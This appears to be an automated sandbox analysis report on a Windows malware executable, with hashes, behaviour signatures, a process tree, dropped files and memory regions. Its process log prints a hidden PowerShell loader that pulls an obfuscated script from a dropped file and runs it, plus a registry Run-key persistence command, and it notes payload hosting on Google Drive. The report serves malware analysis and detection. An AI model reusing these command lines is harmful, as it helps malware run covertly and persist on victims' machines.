Overview
overview
10Static
static
3d3da22560f...06.exe
windows7-x64
10d3da22560f...06.exe
windows10-2004-x64
8$PLUGINSDI...sh.dll
windows7-x64
3$PLUGINSDI...sh.dll
windows10-2004-x64
3$PLUGINSDI...ge.dll
windows7-x64
1$PLUGINSDI...ge.dll
windows10-2004-x64
1$PLUGINSDI...fo.dll
windows7-x64
3$PLUGINSDI...fo.dll
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3Analysis
-
max time kernel
142s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
28-06-2024 01:51
Static task
static1
Behavioral task
behavioral1
Sample
d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/AdvSplash.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/AdvSplash.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/BgImage.dll
Resource
win7-20240508-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/BgImage.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/UserInfo.dll
Resource
win7-20240611-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/UserInfo.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20231129-en
Behavioral task
behavioral10
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240508-en
General
-
Target
d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe
-
Size
655KB
-
MD5
76583ad77f92f7c21402dcf6e7a4b613
-
SHA1
8b20685d00b9c729356f8b3d371da03b326e4a80
-
SHA256
d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306
-
SHA512
79c4a2621da0707c22a79b472a3a90f34debb6a9e1266ccf6826886646c9a1e495535ff800fccc08ac35531cce4e84f98b5b68afdf25e040bdc3e1720109fced
-
SSDEEP
12288:zsB4GOFNFqtVK+NvRHTLii5BpGH1uF5BhZeizW0Ij3:I4GOnFqrnj5BpkO5/ZjKj3
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 4 IoCs
Processes:
d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exepid process 4312 d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe 4312 d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe 4312 d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe 4312 d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solosanges = "%Xenoglossia154% -windowstyle minimized $prelocalizations=(Get-ItemProperty -Path 'HKCU:\\Vivans\\').rearrangeret;%Xenoglossia154% ($prelocalizations)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
Processes:
flow ioc 4 drive.google.com 11 drive.google.com 12 drive.google.com 14 drive.google.com 15 drive.google.com 16 drive.google.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
powershell.exepid process 2468 powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exedescription ioc process File opened for modification C:\Windows\Fonts\anorakkerne.ini d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepid process 2468 powershell.exe 2468 powershell.exe 2468 powershell.exe 2468 powershell.exe 2468 powershell.exe 2468 powershell.exe 2468 powershell.exe 2468 powershell.exe 2468 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2468 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exepowershell.execmd.exedescription pid process target process PID 4312 wrote to memory of 2468 4312 d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe powershell.exe PID 4312 wrote to memory of 2468 4312 d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe powershell.exe PID 4312 wrote to memory of 2468 4312 d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe powershell.exe PID 2468 wrote to memory of 3960 2468 powershell.exe cmd.exe PID 2468 wrote to memory of 3960 2468 powershell.exe cmd.exe PID 2468 wrote to memory of 3960 2468 powershell.exe cmd.exe PID 3960 wrote to memory of 100 3960 cmd.exe reg.exe PID 3960 wrote to memory of 100 3960 cmd.exe reg.exe PID 3960 wrote to memory of 100 3960 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe"C:\Users\Admin\AppData\Local\Temp\d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Ammet=Get-Content 'C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Bygningsbestanddels\Kork.Eks';$hesperidate=$Ammet.SubString(3360,3);.$hesperidate($Ammet)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Solosanges" /t REG_EXPAND_SZ /d "%Xenoglossia154% -windowstyle minimized $prelocalizations=(Get-ItemProperty -Path 'HKCU:\Vivans\').rearrangeret;%Xenoglossia154% ($prelocalizations)"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Solosanges" /t REG_EXPAND_SZ /d "%Xenoglossia154% -windowstyle minimized $prelocalizations=(Get-ItemProperty -Path 'HKCU:\Vivans\').rearrangeret;%Xenoglossia154% ($prelocalizations)"4⤵
- Adds Run key to start application
- Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xs0olf0y.5o3.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\nss3327.tmp\AdvSplash.dllFilesize
6KB
MD56def2cf3daf850acdc1a3e7340a439c4
SHA195d0d26f60cd5af697502cd5e53a54913ab188fb
SHA2563ec3cf21a99ab0533ec2c451df3b5542733f70b972089d5c321ad7ae3b87d175
SHA51216b1cf4783284d4a1282c569f5c416c713b4b339efcd4d3948bdf7da2194c597bd732d07ba9fabafcab323ba8c8da68845d4435ab9d1916b1810087ee1f5c413
-
C:\Users\Admin\AppData\Local\Temp\nss3327.tmp\BgImage.dllFilesize
7KB
MD52bb17d45e5ad92053ce1e500408dd8a9
SHA1f5d3a7ee6e28df532e9ce33976c92ff30a5665e4
SHA25671ce676703dad028e4083e6b960b1ed89885877079d46d5021506eaa6d99db53
SHA512efdcb476b9b9b5691fe6b9cd77ecbe48d50c6683da01fd51c6b428cc262528fb3dcd295abe28718321b2307b0e032fcb599588f1eb00a93fd9e6a1f7b322b41f
-
C:\Users\Admin\AppData\Local\Temp\nss3327.tmp\UserInfo.dllFilesize
4KB
MD58ef0e4eb7c89cdd2b552de746f5e2a53
SHA1820f681e7cec409a02b194a487d1c8af1038acf0
SHA25641293b9f6588e0fbdc8fcf2a9bd8e2b244cd5ff038fc13033378da337219c9dc
SHA512a68533e8a19637d0d44219549b24baba0dc4824424842f125600fda3edcafc4bb6bb340d57a00815f262d82373b440d58d6e4e5b2ceb29bb3f6bc4cbde66c3c5
-
C:\Users\Admin\AppData\Local\Temp\nss3327.tmp\nsExec.dllFilesize
6KB
MD5c129bc26a26be6f5816a03520bb37833
SHA118100042155f948301701744b131c516bf26ddb8
SHA256d3694fa0503158194129d113fcc1c83177ff5a5f93d898ce0bcfe9ce12f06bf4
SHA512dbe79859c41e00a6e951cee889e7f0de29a712792fb531662285a2d6e384884518c7d5d983894c185b3d31d81213d2477cf4576b0114d352b759fe07a1704e63
-
C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Bygningsbestanddels\Kork.EksFilesize
69KB
MD5c81a6714a02500d34518c574f9d4b01f
SHA1e8f5d63579d995c2e80aa96c2fa51b3502739792
SHA256134b2aeb304ebbbcd2cf8b1eff5b54bd122795ea5eaf70c939ac27fb979459f2
SHA51290fe3078eb67b5cf39605672f130feeb4e348042ee8792a8e366332d12b3c1c5950655e10b7d6112d8a96b98760fe0a6f5ffb217bb932cbb66494c1a1c6e35c4
-
C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Bygningsbestanddels\Pitilessness.Lge211Filesize
337KB
MD584cb54267314cdae695bbdbbdd55740a
SHA15bf6c405ff05211a5b5455818380449baecac63b
SHA25640ac4dd2689ff258481e2881bfb93508828a98f3236b09393f7fdbeafd461805
SHA51249b46e4e08c720207b968b02b301881f8a7140b1afaf3e5adc05119634a69acabb81097a17daed421c96ef14c9ec4919b718d7d768099d6a2bbf47497f67fa4b
-
C:\Users\Admin\Pictures\slukningen.lnkFilesize
1004B
MD5d15ed1e1621e68ceb6487fe5d2f80940
SHA179d3116989a3e65a2e030ebff35528c0404f4262
SHA256e8a5a33a04c80fe9e8b4dacb46e8d4ff70e3cf4c56b0a1e8e3a9229a4ce1c0f9
SHA512e6651c301f2fd711ea9604160926484b97547fe646084da73689814c0f5a538777710fa8f43d5dd08595f887c5c357fdbc12b53169853ac38e6792e3d4ade90a
-
memory/2468-168-0x0000000006970000-0x00000000069BC000-memory.dmpFilesize
304KB
-
memory/2468-150-0x0000000003320000-0x0000000003356000-memory.dmpFilesize
216KB
-
memory/2468-154-0x0000000005A80000-0x0000000005AA2000-memory.dmpFilesize
136KB
-
memory/2468-155-0x00000000061F0000-0x0000000006256000-memory.dmpFilesize
408KB
-
memory/2468-156-0x00000000062D0000-0x0000000006336000-memory.dmpFilesize
408KB
-
memory/2468-157-0x0000000006340000-0x0000000006694000-memory.dmpFilesize
3.3MB
-
memory/2468-152-0x0000000074190000-0x0000000074940000-memory.dmpFilesize
7.7MB
-
memory/2468-167-0x0000000006940000-0x000000000695E000-memory.dmpFilesize
120KB
-
memory/2468-151-0x0000000005BC0000-0x00000000061E8000-memory.dmpFilesize
6.2MB
-
memory/2468-170-0x0000000006E60000-0x0000000006E7A000-memory.dmpFilesize
104KB
-
memory/2468-169-0x0000000007910000-0x00000000079A6000-memory.dmpFilesize
600KB
-
memory/2468-171-0x0000000006EB0000-0x0000000006ED2000-memory.dmpFilesize
136KB
-
memory/2468-172-0x0000000007F60000-0x0000000008504000-memory.dmpFilesize
5.6MB
-
memory/2468-153-0x0000000074190000-0x0000000074940000-memory.dmpFilesize
7.7MB
-
memory/2468-174-0x0000000008B90000-0x000000000920A000-memory.dmpFilesize
6.5MB
-
memory/2468-176-0x0000000074190000-0x0000000074940000-memory.dmpFilesize
7.7MB
-
memory/2468-177-0x0000000074190000-0x0000000074940000-memory.dmpFilesize
7.7MB
-
memory/2468-149-0x000000007419E000-0x000000007419F000-memory.dmpFilesize
4KB
-
memory/2468-179-0x0000000074190000-0x0000000074940000-memory.dmpFilesize
7.7MB
-
memory/2468-180-0x0000000009210000-0x000000000D01D000-memory.dmpFilesize
62.1MB
-
memory/2468-181-0x000000007419E000-0x000000007419F000-memory.dmpFilesize
4KB
-
memory/2468-182-0x0000000074190000-0x0000000074940000-memory.dmpFilesize
7.7MB
-
memory/2468-184-0x0000000074190000-0x0000000074940000-memory.dmpFilesize
7.7MB
-
memory/2468-185-0x0000000026730000-0x0000000027984000-memory.dmpFilesize
18.3MB
-
memory/2468-186-0x0000000074190000-0x0000000074940000-memory.dmpFilesize
7.7MB
-
memory/2468-189-0x0000000074190000-0x0000000074940000-memory.dmpFilesize
7.7MB
-
memory/2468-190-0x0000000074190000-0x0000000074940000-memory.dmpFilesize
7.7MB